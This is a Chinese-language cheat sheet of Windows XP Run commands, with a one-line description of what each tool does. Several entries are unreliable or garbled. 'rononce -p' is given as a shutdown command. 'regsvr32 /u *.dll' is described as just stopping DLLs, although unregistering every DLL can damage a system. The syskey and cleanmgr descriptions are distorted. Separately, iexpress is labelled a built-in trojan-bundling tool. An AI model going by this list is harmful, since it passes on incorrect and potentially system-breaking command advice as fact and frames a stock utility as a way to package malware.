設備管理器dfrg.msc-------磁盤碎片整理程序diskmgmt.msc---磁盤管理實用程序dcomcnfg-------打開系統組件服務ddeshare-------打開DDE共享設置dvdplay--------DVD播放器net stop messenger-----停止信使服務net start messenger----開始信使服務notepad--------打開記事本nslookup-------網絡管理的工具向導ntbackup-------系統備份和還原narrator-------屏幕"講述人"ntmsmgr.msc----移動存儲管理器ntmsoprq.msc---移動存儲管理員操作請求netstat -an----(TC)命令檢查接口syncapp--------創建一個公文包sysedit--------系統配置編輯器sigverif-------文件簽名驗証程序sndrec32-------錄音机shrpubw--------創建共享文件夾secpol.msc-----本地安全策略syskey---------系統加密，一旦加密就不能解開，保護windows xp系統的雙重密碼services.msc---本地服務設置Sndvol32-------音量控制程序sfc.exe--------系統文件檢查器sfc /scannow---windows文件保護tsshutdn-------60秒倒計時關机命令tourstart------xp簡介（安裝完成后出現的漫游xp程序）taskmgr--------任務管理器eventvwr-------事件查看器eudcedit-------造字程序explorer-------打開資源管理器packager-------對象包裝程序perfmon.msc----計算机性能監測程序progman--------程序管理器regedit.exe----注冊表rsop.msc-------組策略結果集regedt32-------注冊表編輯器rononce -p ----15秒關机regsvr32 /u *.dll----停止dll文件運行regsvr32 /u zipfldr.dll------取消ZIP支持cmd.exe--------CMD命令提示符chkdsk.exe-----Chkdsk磁盤檢查certmgr.msc----証書管理實用程序calc-----------啟動計算器charmap--------啟動字符映射表cliconfg-------SQL SERVER 客戶端網絡實用程序Clipbrd--------剪貼板查看器conf-----------啟動netmeetingcompmgmt.msc---計算机管理cleanmgr-------**整理ciadv.msc------索引服務程序osk------------打開屏幕鍵盤odbcad32-------ODBC數据源管理器oobe/msoobe /a----檢查XP是否激活lusrmgr.msc----本机用戶和組logoff---------注銷命令iexpress-------木馬捆綁工具，系統自帶Nslookup-------IP地址偵測器fsmgmt.msc-----共享文件夾管理器utilman--------輔助工具管理器gpedit.msc-----組策略